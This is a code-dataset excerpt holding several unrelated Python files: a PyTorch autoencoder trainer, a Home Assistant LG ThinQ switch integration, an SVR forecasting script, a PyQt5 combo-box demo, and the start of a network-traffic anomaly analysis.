'AtoB'\r\n\t\tinput_A = input['A' if AtoB else 'B']\t# projection image\r\n\t\tinput_B = input['B' if AtoB else 'A']\t# gt\r\n\t\tself.input_A.resize_(input_A.size()).copy_(input_A)\r\n\t\tself.input_B.resize_(input_B.size()).copy_(input_B)\r\n\t\tself.image_paths = input['A_paths' if AtoB else 'B_paths']\r\n\r\n\tdef validation(self):\r\n\t\tif self.opt.which_model_netG == 'introAE':\r\n\t\t\twith torch.no_grad():\r\n\t\t\t\tself.real_A = torch.autograd.Variable(self.input_A)\r\n\t\t\t\tself.real_B = torch.autograd.Variable(self.input_B)\r\n\t\t\t\tself.netG.eval()\r\n\t\t\t\tself.latent, self.fake_B = self.netG(self.real_B)\r\n\t\t\t\tself.fake_B = self.fake_B.detach()\r\n\t\t\t\tself.latent = self.latent.detach()\r\n\r\n\t\t\t\tself.loss_G_Content = self.contentLoss.get_loss(self.fake_B, self.real_B)\r\n\t\t\t\tself.loss_G_L1 = self.contentLoss.get_l1loss(self.fake_B, self.real_B)\r\n\t\t\t\tself.loss_G_L2 = self.contentLoss.get_mseloss(self.fake_B, self.real_B)\r\n\t\telse:\r\n\t\t\traise ValueError('This repo only support the autoencoder modified from introAE, i.e., opt.which_model_netG == introAE. 
\\\r\n\t\t\tBut you can use this option to add new model')\r\n\r\n\tdef forward(self):\r\n\t\tself.netG.train()\r\n\t\tgpu_ids = self.opt.gpu_ids\r\n\t\tself.real_A = Variable(self.input_A)\r\n\t\tself.real_B = Variable(self.input_B)\r\n\t\tif self.opt.which_model_netG == 'introAE':\r\n\t\t\tself.latent, self.fake_B = self.netG(self.real_A)\r\n\t\telse:\r\n\t\t\traise ValueError('This repo only support the autoencoder modified from introAE, i.e., opt.which_model_netG == introAE. \\\r\n\t\t\tBut you can use this option to add new model')\r\n\r\n\t# get image paths\r\n\tdef get_image_paths(self):\r\n\t\treturn self.image_paths\r\n\r\n\tdef optimize_parameters(self):\r\n\t\tif self.opt.which_model_netG == 'introAE':\r\n\t\t\tself.forward()\r\n\t\t\tself.loss_G_Content = self.contentLoss.get_loss(self.fake_B, self.real_B)\r\n\t\t\tself.loss_G_L1 = self.contentLoss.get_l1loss(self.fake_B, self.real_B)\r\n\t\t\tself.loss_G_L2 = self.contentLoss.get_mseloss(self.fake_B, self.real_B)\r\n\t\t\tself.loss_G = self.loss_G_L1*0.001 + self.loss_G_Content*5\t# only use L1 and perceptual loss\r\n\t\t\tself.optimizer_G_E1.zero_grad()\r\n\t\t\tself.optimizer_G_D.zero_grad()\r\n\t\t\tself.loss_G.backward()\r\n\t\t\tself.optimizer_G_E1.step()\r\n\t\t\tself.optimizer_G_D.step()\r\n\t\telse:\r\n\t\t\traise ValueError('This repo only support the autoencoder modified from introAE, i.e., opt.which_model_netG == introAE. \\\r\n\t\t\tBut you can use this option to add new model')\r\n\r\n\tdef get_current_errors_ae(self):\r\n\t\treturn OrderedDict([('AE_Loss', self.loss_AE.data[0])\r\n\t\t\t\t\t\t\t])\r\n\r\n\tdef get_current_errors(self):\r\n\t\treturn OrderedDict([('G_percetual No', self.loss_G_Content.item()),\r\n\t\t\t\t\t\t\t('G_L1 *1', self.loss_G_L1.item()),\r\n\t\t\t\t\t\t\t('G_L2 *1000', self.loss_G_L2.item())\r\n\t\t\t\t\t\t\t])\r\n\r\n\tdef get_current_errors_val(self):\r\n\t\treturn OrderedDict([\r\n\t\t\t('G_percetual_val', self.loss_G_Content.item()),\r\n\t\t\t('G_L1_val', self.loss_G_L1.item()),\r\n\t\t\t('G_L2_val', self.loss_G_L2.item())\r\n\t\t\t\t\t\t\t\t])\r\n\r\n\tdef get_current_visuals(self):\r\n\t\treal_A = util.tensor2im(self.real_A.data)\r\n\t\tfake_B = util.tensor2im(self.fake_B.data)\r\n\t\treal_B = util.tensor2im(self.real_B.data)\r\n\t\treturn OrderedDict([('Blurred_Train', real_A), ('Restored_Train', fake_B), ('Sharp_Train', real_B)])\r\n\r\n\r\n\tdef save(self, label):\r\n\t\tif self.opt.which_model_netG == 'introAE':\r\n\t\t\tself.save_network(self.netG.decoder, 'G_Decoder', label, self.gpu_ids)\r\n\t\t\tself.save_network(self.netG.encoder, 'G_Encoder1', label, self.gpu_ids)\r\n\t\telse:\r\n\t\t\traise ValueError('This repo only support the autoencoder modified from introAE, i.e., opt.which_model_netG == introAE. 
\\\r\n\t\t\tBut you can use this option to add new model')\r\n\r\n\tdef update_learning_rate(self):\r\n\t\tlrd = self.opt.lr / self.opt.niter_decay\r\n\t\tlr = self.old_lr - lrd\r\n\t\tfor param_group in self.optimizer_G_E1.param_groups:\r\n\t\t\tparam_group['lr'] = lr\r\n\t\tfor param_group in self.optimizer_G_D.param_groups:\r\n\t\t\tparam_group['lr'] = lr\r\n\t\tprint('update learning rate: %f -> %f' % (self.old_lr, lr))\r\n\t\tself.old_lr = lr\r\n", "repo_name": "ruixv/NLOS-OT", "sub_path": "step1/models/conditional_gan_model.py", "file_name": "conditional_gan_model.py", "file_ext": "py", "file_size_in_byte": 6079, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "52", "api": [{"api_name": "base_model.BaseModel", "line_number": 21, "usage_type": "name"}, {"api_name": "base_model.BaseModel.initialize", "line_number": 27, "usage_type": "call"}, {"api_name": "base_model.BaseModel", "line_number": 27, "usage_type": "name"}, {"api_name": "losses.init_loss", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 89, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 117, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 121, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 127, "usage_type": "call"}, {"api_name": "util.util.tensor2im", "line_number": 134, "usage_type": "call"}, {"api_name": "util.util", "line_number": 134, "usage_type": "name"}, {"api_name": "util.util.tensor2im", "line_number": 135, "usage_type": "call"}, {"api_name": "util.util", "line_number": 135, "usage_type": "name"}, {"api_name": "util.util.tensor2im", "line_number": 136, "usage_type": "call"}, {"api_name": "util.util", "line_number": 136, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "15805330235", "text": "# REQUIREMENTS = ['wideq']\n# DEPENDENCIES = ['smartthinq']\n\nimport logging\nfrom datetime import timedelta\n\nfrom .wideq.device import (\n STATE_OPTIONITEM_OFF,\n STATE_OPTIONITEM_ON,\n WM_DEVICE_TYPES,\n DeviceType,\n)\nfrom .wideq import (\n FEAT_ECOFRIENDLY,\n FEAT_EXPRESSFRIDGE,\n FEAT_EXPRESSMODE,\n FEAT_ICEPLUS,\n)\n\nfrom homeassistant.components.switch import (\n DOMAIN as SENSOR_DOMAIN,\n SwitchEntity,\n)\n\nfrom homeassistant.const import (\n STATE_ON,\n STATE_OFF,\n)\nfrom homeassistant.helpers.update_coordinator import CoordinatorEntity\n\nfrom .const import DOMAIN, LGE_DEVICES\nfrom . 
import LGEDevice\n\n# switch definition\nATTR_SWITCH_NAME = \"switch_name\"\nATTR_ICON = \"icon\"\nATTR_DEVICE_CLASS = \"device_class\"\nATTR_VALUE_FEAT = \"value_feat\"\nATTR_VALUE_FN = \"value_fn\"\nATTR_TURN_OFF_FN = \"turn_off_fn\"\nATTR_TURN_ON_FN = \"turn_on_fn\"\nATTR_AVAILABLE_FN = \"available_fn\"\nATTR_ENABLED = \"enabled\"\n\n# general sensor attributes\nATTR_POWER_OFF = \"power_off\"\n\nSTATE_LOOKUP = {\n STATE_OPTIONITEM_OFF: STATE_OFF,\n STATE_OPTIONITEM_ON: STATE_ON,\n}\n\nDEFAULT_ICON = \"def_icon\"\n\nSCAN_INTERVAL = timedelta(seconds=120)\n\n_LOGGER = logging.getLogger(__name__)\n\nDEVICE_ICONS = {\n DeviceType.WASHER: \"mdi:washing-machine\",\n DeviceType.DRYER: \"mdi:tumble-dryer\",\n DeviceType.STYLER: \"mdi:palette-swatch-outline\",\n DeviceType.DISHWASHER: \"mdi:dishwasher\",\n DeviceType.REFRIGERATOR: \"mdi:fridge-outline\",\n DeviceType.RANGE: \"mdi:stove\",\n}\n\nWASH_DEV_SWITCH = {\n ATTR_POWER_OFF: {\n ATTR_SWITCH_NAME: \"Power off\",\n # ATTR_ICON: DEFAULT_ICON,\n # ATTR_DEVICE_CLASS: None,\n ATTR_VALUE_FN: lambda x: x._power_on,\n ATTR_TURN_OFF_FN: lambda x: x._api.device.power_off(),\n ATTR_ENABLED: True,\n },\n}\n\nREFR_DEV_SWITCH = {\n FEAT_ECOFRIENDLY: {\n ATTR_SWITCH_NAME: \"Eco friendly\",\n ATTR_ICON: \"mdi:gauge-empty\",\n ATTR_VALUE_FEAT: FEAT_ECOFRIENDLY,\n ATTR_TURN_OFF_FN: lambda x: x._api.device.set_eco_friendly(False),\n ATTR_TURN_ON_FN: lambda x: x._api.device.set_eco_friendly(True),\n ATTR_ENABLED: True,\n },\n FEAT_EXPRESSFRIDGE: {\n ATTR_SWITCH_NAME: \"Express fridge\",\n ATTR_ICON: \"mdi:coolant-temperature\",\n ATTR_VALUE_FEAT: FEAT_EXPRESSFRIDGE,\n ATTR_TURN_OFF_FN: lambda x: x._api.device.set_express_fridge(False),\n ATTR_TURN_ON_FN: lambda x: x._api.device.set_express_fridge(True),\n ATTR_AVAILABLE_FN: lambda x: x._api.device.set_values_allowed,\n ATTR_ENABLED: True,\n },\n FEAT_EXPRESSMODE: {\n ATTR_SWITCH_NAME: \"Express mode\",\n ATTR_ICON: \"mdi:snowflake\",\n ATTR_VALUE_FEAT: FEAT_EXPRESSMODE,\n ATTR_TURN_OFF_FN: lambda x: x._api.device.set_express_mode(False),\n ATTR_TURN_ON_FN: lambda x: x._api.device.set_express_mode(True),\n ATTR_AVAILABLE_FN: lambda x: x._api.device.set_values_allowed,\n ATTR_ENABLED: True,\n },\n FEAT_ICEPLUS: {\n ATTR_SWITCH_NAME: \"Ice plus\",\n ATTR_ICON: \"mdi:snowflake\",\n ATTR_VALUE_FEAT: FEAT_ICEPLUS,\n ATTR_TURN_OFF_FN: lambda x: x._api.device.set_ice_plus(False),\n ATTR_TURN_ON_FN: lambda x: x._api.device.set_ice_plus(True),\n ATTR_AVAILABLE_FN: lambda x: x._api.device.set_values_allowed,\n ATTR_ENABLED: True,\n },\n}\n\n\ndef _feature_exist(lge_device, switch_def):\n \"\"\"Check if a switch exist for device.\"\"\"\n if ATTR_VALUE_FN in switch_def:\n return True\n\n if ATTR_VALUE_FEAT in switch_def:\n feature = switch_def[ATTR_VALUE_FEAT]\n for feat_name in lge_device.available_features.keys():\n if feat_name == feature:\n return True\n\n return False\n\n\nasync def async_setup_entry(hass, config_entry, async_add_entities):\n \"\"\"Set up the LGE switch.\"\"\"\n _LOGGER.info(\"Starting LGE ThinQ switch...\")\n\n lge_switch = []\n entry_config = hass.data[DOMAIN]\n lge_devices = entry_config.get(LGE_DEVICES)\n if not lge_devices:\n return\n\n # add wash devices\n wash_devices = []\n for dev_type, devices in lge_devices.items():\n if dev_type in WM_DEVICE_TYPES:\n wash_devices.extend(devices)\n\n lge_switch.extend(\n [\n LGESwitch(lge_device, def_id, definition)\n for def_id, definition in WASH_DEV_SWITCH.items()\n for lge_device in wash_devices\n if _feature_exist(lge_device, definition)\n ]\n )\n\n # 
add refrigerators\n lge_switch.extend(\n [\n LGESwitch(lge_device, def_id, definition)\n for def_id, definition in REFR_DEV_SWITCH.items()\n for lge_device in lge_devices.get(DeviceType.REFRIGERATOR, [])\n if _feature_exist(lge_device, definition)\n ]\n )\n\n async_add_entities(lge_switch)\n\n\nclass LGESwitch(CoordinatorEntity, SwitchEntity):\n def __init__(\n self,\n device: LGEDevice,\n def_id,\n definition,\n ):\n \"\"\"Initialize the switch.\"\"\"\n super().__init__(device.coordinator)\n self._api = device\n self._name_slug = device.name\n self._def_id = def_id\n self._def = definition\n self._name = None\n\n @property\n def should_poll(self) -> bool:\n \"\"\"Return True if entity has to be polled for state.\n\n We overwrite coordinator property default setting because we need\n to poll to avoid the effect that after changing a climate settings\n it is immediately set to prev state. The async_update method here\n do nothing because the real update is performed by coordinator.\n \"\"\"\n return True\n\n async def async_update(self) -> None:\n \"\"\"Update the entity.\n\n This is a fake update, real update is done by coordinator.\n \"\"\"\n return\n\n @property\n def entity_registry_enabled_default(self) -> bool:\n \"\"\"Return if the entity should be enabled when first added to the entity registry.\"\"\"\n return self._def.get(ATTR_ENABLED, False)\n\n @property\n def name(self) -> str:\n \"\"\"Return the name of the sensor.\"\"\"\n if not self._name:\n name = None\n if ATTR_VALUE_FEAT in self._def:\n feat_key = self._def[ATTR_VALUE_FEAT]\n feat_name = self._api.available_features.get(feat_key)\n if feat_name and feat_name != feat_key:\n name = feat_name.replace(\"_\", \" \").capitalize()\n if not name:\n name = self._def[ATTR_SWITCH_NAME]\n self._name = f\"{self._name_slug} {name}\"\n return self._name\n\n @property\n def unique_id(self) -> str:\n \"\"\"Return a unique ID.\"\"\"\n return f\"{self._api.unique_id}-{self._def_id}-switch\"\n\n @property\n def device_class(self):\n \"\"\"Return device class.\"\"\"\n return self._def.get(ATTR_DEVICE_CLASS)\n\n @property\n def icon(self):\n \"\"\"Return the icon to use in the frontend, if any.\"\"\"\n icon = self._def.get(ATTR_ICON)\n if not icon:\n return None\n if icon == DEFAULT_ICON:\n icon = DEVICE_ICONS.get(self._api.type)\n return icon\n\n @property\n def is_on(self):\n \"\"\"Return the state of the switch.\"\"\"\n ret_val = self._get_sensor_state()\n if ret_val is None:\n return False\n if isinstance(ret_val, bool):\n return ret_val\n if ret_val == STATE_ON:\n return True\n state = STATE_LOOKUP.get(ret_val, STATE_OFF)\n return state == STATE_ON\n\n @property\n def available(self) -> bool:\n \"\"\"Return True if entity is available.\"\"\"\n is_avail = True\n if ATTR_AVAILABLE_FN in self._def:\n is_avail = self._def[ATTR_AVAILABLE_FN](self)\n return self._api.available and self._power_on and is_avail\n\n @property\n def assumed_state(self) -> bool:\n \"\"\"Return True if unable to access real state of the entity.\"\"\"\n return self._api.assumed_state\n\n @property\n def device_state_attributes(self):\n \"\"\"Return the optional state attributes.\"\"\"\n return self._api.state_attributes\n\n @property\n def device_info(self):\n \"\"\"Return the device info.\"\"\"\n return self._api.device_info\n\n def turn_off(self):\n \"\"\"Turn the entity off.\"\"\"\n if ATTR_TURN_OFF_FN not in self._def:\n raise NotImplementedError()\n if self.is_on:\n self._def[ATTR_TURN_OFF_FN](self)\n\n def turn_on(self):\n \"\"\"Turn the entity on.\"\"\"\n if 
ATTR_TURN_ON_FN not in self._def:\n raise NotImplementedError()\n if not self.is_on:\n self._def[ATTR_TURN_ON_FN](self)\n\n @property\n def _power_on(self):\n \"\"\"Current power state\"\"\"\n if self._api.state:\n return self._api.state.is_on\n return False\n\n def _get_sensor_state(self):\n if ATTR_VALUE_FN in self._def:\n return self._def[ATTR_VALUE_FN](self)\n\n if ATTR_VALUE_FEAT in self._def:\n if self._api.state:\n feature = self._def[ATTR_VALUE_FEAT]\n return self._api.state.device_features.get(feature)\n\n return None\n", "repo_name": "dhahaj/homeassistant_backup", "sub_path": "custom_components/smartthinq_sensors/switch.py", "file_name": "switch.py", "file_ext": "py", "file_size_in_byte": 9193, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "wideq.device.STATE_OPTIONITEM_OFF", "line_number": 49, "usage_type": "name"}, {"api_name": "wideq.device.STATE_OPTIONITEM_ON", "line_number": 50, "usage_type": "name"}, {"api_name": "homeassistant.const.STATE_OFF", "line_number": 49, "usage_type": "name"}, {"api_name": "homeassistant.const.STATE_ON", "line_number": 50, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 57, "usage_type": "call"}, {"api_name": "wideq.device.DeviceType.WASHER", "line_number": 60, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 60, "usage_type": "name"}, {"api_name": "wideq.device.DeviceType.DRYER", "line_number": 61, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 61, "usage_type": "name"}, {"api_name": "wideq.device.DeviceType.STYLER", "line_number": 62, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 62, "usage_type": "name"}, {"api_name": "wideq.device.DeviceType.DISHWASHER", "line_number": 63, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 63, "usage_type": "name"}, {"api_name": "wideq.device.DeviceType.REFRIGERATOR", "line_number": 64, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 64, "usage_type": "name"}, {"api_name": "wideq.device.DeviceType.RANGE", "line_number": 65, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 65, "usage_type": "name"}, {"api_name": "wideq.FEAT_ECOFRIENDLY", "line_number": 80, "usage_type": "name"}, {"api_name": "wideq.FEAT_EXPRESSFRIDGE", "line_number": 88, "usage_type": "name"}, {"api_name": "wideq.FEAT_EXPRESSMODE", "line_number": 97, "usage_type": "name"}, {"api_name": "wideq.FEAT_ICEPLUS", "line_number": 106, "usage_type": "name"}, {"api_name": "wideq.FEAT_ECOFRIENDLY", "line_number": 83, "usage_type": "name"}, {"api_name": "wideq.FEAT_EXPRESSFRIDGE", "line_number": 91, "usage_type": "name"}, {"api_name": "wideq.FEAT_EXPRESSMODE", "line_number": 100, "usage_type": "name"}, {"api_name": "wideq.FEAT_ICEPLUS", "line_number": 109, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 137, "usage_type": "name"}, {"api_name": "const.LGE_DEVICES", "line_number": 138, "usage_type": "argument"}, {"api_name": "wideq.device.WM_DEVICE_TYPES", "line_number": 145, "usage_type": "name"}, {"api_name": "wideq.device.DeviceType.REFRIGERATOR", "line_number": 162, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 162, "usage_type": "name"}, {"api_name": "homeassistant.helpers.update_coordinator.CoordinatorEntity", 
"line_number": 170, "usage_type": "name"}, {"api_name": "homeassistant.components.switch.SwitchEntity", "line_number": 170, "usage_type": "name"}, {"api_name": "homeassistant.const.STATE_ON", "line_number": 251, "usage_type": "name"}, {"api_name": "homeassistant.const.STATE_OFF", "line_number": 253, "usage_type": "argument"}, {"api_name": "homeassistant.const.STATE_ON", "line_number": 254, "usage_type": "name"}]} +{"seq_id": "20976042854", "text": "\nimport numpy as np\nfrom time import time\nimport sqlite3 as db\nfrom datetime import datetime\nimport pandas as pd\nfrom sklearn.svm import SVR\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import GridSearchCV\n\nstart = time()\n\n\nforecast_start_dt = '2021-06-21 11:00:00'\n\nduration = 6\n\ndatabase_path = \"/home/sachin/Downloads/RWO_0004_Ventilatoren_00.sqlite\"\n\n\ndef load_required_value(forecast_start_dt):\n train_start_dt = str(pd.Timestamp(forecast_start_dt) - pd.DateOffset(hours=duration, seconds=4))\n forecast_end_dt = str(pd.Timestamp(forecast_start_dt) + pd.DateOffset(hours=duration))\n df_train = create_data_frame(train_start_dt, forecast_start_dt)\n forecast_start_dt = str(pd.Timestamp(forecast_start_dt) - pd.DateOffset(seconds=4))\n df_test = create_data_frame(forecast_start_dt, forecast_end_dt)\n return df_train, df_test\n\ndef create_data_frame(start_date, end_date):\n con = db.connect(database_path)\n start_dt_utc = datetime.timestamp(datetime.strptime(start_date, '%Y-%m-%d %H:%M:%S')) * 1000\n end_dt_utc = datetime.timestamp(datetime.strptime(end_date, '%Y-%m-%d %H:%M:%S')) * 1000\n df = pd.read_sql_query(f\"SELECT time, value FROM Value WHERE sensor_id=1 AND \"\n f\"time >= '{int(start_dt_utc)}' AND time < '{int(end_dt_utc)}'\",\n con)\n df[\"time\"] = df[\"time\"].apply(lambda utc: datetime.fromtimestamp(int(utc / 1000)))\n df.drop_duplicates(subset=\"time\", keep=\"first\", inplace=True)\n df.index = df['time']\n\n df = df.reindex(pd.date_range(start_date,\n end_date,\n freq='S'))\n df.drop('time', axis=1, inplace=True)\n df = df.interpolate().fillna(method='bfill')\n df.drop(df.tail(1).index, inplace=True)\n con.close()\n return df\n\n\ntrain, test = load_required_value(forecast_start_dt)\n\nscaler = MinMaxScaler()\n\ntrain['value'] = scaler.fit_transform(train)\n\ntest['value'] = scaler.transform(test)\n\n\ntrain_data = train.values\ntest_data = test.values\n\ntimesteps=5\n\ntrain_data_timesteps = np.array([[j for j in train_data[i:i+timesteps]] for i in range(0, len(train_data)-timesteps+1)])[ :, :, 0]\n\ntest_data_timesteps = np.array([[j for j in test_data[i:i+timesteps]] for i in range(0, len(test_data)-timesteps+1)])[:, :, 0]\n\nX_train, y_train = train_data_timesteps[:, :timesteps-1], train_data_timesteps[:, [timesteps-1]]\nX_test, y_test = test_data_timesteps[:, :timesteps-1], test_data_timesteps[:, [timesteps-1]]\n\n\nparams = {\n 'kernel': ['rbf', 'linear', 'sigmoid'],\n 'C': [0.001, 0.01, 0.1, 1, 10, 100],\n 'gamma': [0.001, 0.01, 0.1, 1, 10, 100],\n 'epsilon': [0.001, 0.01, 0.1, 1, 10, 100]\n }\n\ngrid_search = GridSearchCV(SVR(), params, cv=5, n_jobs=-1, verbose=1)\n\ngrid_search.fit(X_train, y_train[:, 0])\n\nprint(\"train score - \" + str(grid_search.score(X_train, y_train)))\nprint(\"test score - \" + str(grid_search.score(X_test, y_test)))\n\nprint(\"SVR GridSearch score: \"+str(grid_search.best_score_))\nprint(\"SVR GridSearch params: \")\nprint(grid_search.best_params_)", "repo_name": "sach1n1/Thesis_PoC", "sub_path": "SVR_opt/SVR_CV.py", "file_name": "SVR_CV.py", 
"file_ext": "py", "file_size_in_byte": 3083, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "time.time", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.DateOffset", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.DateOffset", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DateOffset", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.timestamp", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime.timestamp", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 32, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "name"}, {"api_name": "pandas.date_range", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 79, "usage_type": "call"}, {"api_name": "sklearn.svm.SVR", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "8743189837", "text": "# -*- coding: utf-8 -*-\nfrom PyQt5 import QtWidgets\nimport sys\n\n\nclass AddItem(QtWidgets.QWidget):\n\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n\n self.setWindowTitle(\"Класс QComboBox\")\n self.resize(300, 90)\n self.comboBox = QtWidgets.QComboBox()\n for i in range(1, 11):\n self.comboBox.addItem(\"Пункт {0}\".format(i), i)\n ico = self.style().standardIcon(\n QtWidgets.QStyle.SP_MessageBoxCritical)\n self.comboBox.addItem(ico, \"Пункт 11\", 11)\n self.button = QtWidgets.QPushButton(\"Получить значение\")\n self.button.clicked.connect(self.on_clicked)\n box = QtWidgets.QVBoxLayout()\n box.addWidget(self.comboBox)\n box.addWidget(self.button)\n self.setLayout(box)\n self.show()\n\n def on_clicked(self):\n print(\"Текст:\", self.comboBox.currentText())\n print(\"Данные:\", self.comboBox.itemData(self.comboBox.currentIndex()))\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ex = AddItem()\n sys.exit(app.exec_())", "repo_name": "syurskyi/Python_Topics", "sub_path": "140_gui/pyqt_pyside/examples/PyQt_PySide_book/005_Lists and tables/001_Drop-down list/358_addItem_toClass.py", "file_name": "358_addItem_toClass.py", "file_ext": "py", "file_size_in_byte": 1148, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 6, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 6, "usage_type": "name"}, {"api_name": 
"PyQt5.QtWidgets.QComboBox", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 17, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QStyle", "line_number": 21, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 21, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 25, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 25, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 37, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "37783975232", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 26 14:14:46 2020\r\n\r\n@author: Tony_Tien\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nimport pickle\r\n\r\nfrom sklearn.svm import OneClassSVM\r\nfrom sklearn import ensemble, preprocessing, metrics\r\nfrom datetime import datetime\r\nfrom matplotlib import pyplot as plt\r\nfrom DetrendMethod import detrend_with_lowpass\r\nfrom config import *\r\nfrom calculate import *\r\nfrom ModelTraining import *\r\nfrom plot_function import *\r\n\r\n\r\nHave_cycle_source_data = pd.read_csv(data_path + '{}___Have_cycle_source_data.csv'.format(SourceDataType))\r\n\r\nAll_result = []\r\nfor key,value in tqdm(Have_cycle_source_data.groupby(['source_ip'])):\r\n# key = '192.168.88.178'\r\n value = Have_cycle_source_data.groupby(['source_ip']).get_group(key).copy()\r\n value['weekend'] = value['ds'].apply(lambda x: datetime.strptime(x, \"%Y-%m-%d\").weekday()+1)\r\n basis = value[(value['ds'] >= train_start_date) & (value['ds'] <= train_cut_date)]\r\n mode = 7\r\n \r\n All_mean = []\r\n for i in range(int(len(value)/mode)):\r\n test_data_raw = value[0+i*mode : (i+1)*mode].sort_values(by = ['weekend'])\r\n test_data = test_data_raw['unique_dest_cnt'].values\r\n All_mean.append(np.mean(test_data))\r\n All_log_mean = np.log(All_mean)\r\n \r\n Feature_df = pd.DataFrame({'mean':All_mean,'log_mean':All_log_mean})\r\n Feature_df.loc[0:int(len(basis)/mode)-1,'type'] = 'Training'\r\n Feature_df.loc[int(len(basis)/mode)::,'type'] = 'Testing'\r\n \r\n #跟basis的diff\r\n # basis_high_iqr = basis['total_sent_bytes'].describe()['75%'] + ((basis['total_sent_bytes'].describe()['75%'] - basis['total_sent_bytes'].describe()['25%']))*1.5\r\n # basis_low_iqr = basis['total_sent_bytes'].describe()['25%'] - ((basis['total_sent_bytes'].describe()['75%'] - basis['total_sent_bytes'].describe()['25%']))*1.5\r\n # \r\n # basis_filter = basis[(basis['total_sent_bytes'] > basis_low_iqr) & (basis['total_sent_bytes'] < basis_high_iqr)]\r\n # basis_mean = np.mean(basis_filter['total_sent_bytes'])\r\n \r\n # All_mean_diff = []\r\n # for i in range(int(len(value)/mode)): \r\n # test_data_raw = value[0+i*mode : (i+1)*mode].sort_values(by = ['weekend'])\r\n # test_data = test_data_raw['total_sent_bytes'].values\r\n # mean_diff = np.mean(test_data) - basis_mean\r\n # All_mean_diff.append(mean_diff)\r\n # Feature_df['mean_diff'] = All_mean_diff\r\n Training = Feature_df[Feature_df['type'] == 'Training']['mean'].values\r\n #plt.plot(Training , 'bo')\r\n #plt.ylabel('Mean of each period',fontsize = 12)\r\n 
